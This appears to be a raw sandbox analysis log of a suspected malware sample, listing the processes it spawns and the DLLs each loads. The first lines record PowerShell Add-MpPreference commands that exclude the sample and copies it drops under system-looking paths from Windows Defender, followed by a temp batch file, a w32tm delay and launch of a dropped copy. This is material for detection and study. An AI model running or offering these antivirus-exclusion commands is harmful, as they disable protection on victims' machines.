Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe'	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\dEhCbXEAIUCUplvbdoWVtmGx.exe'	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe'	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fdsN8iw6WG.exe'	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\V10Cviyryl.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES34F8.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC13EEC4598AE74082ADE16A1F2183AE80.TMP"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES38D0.tmp" "c:\Windows\System32\CSC8295EB2BCC8D4700AEF6D1253A133871.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe "C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe"

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: wldp.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
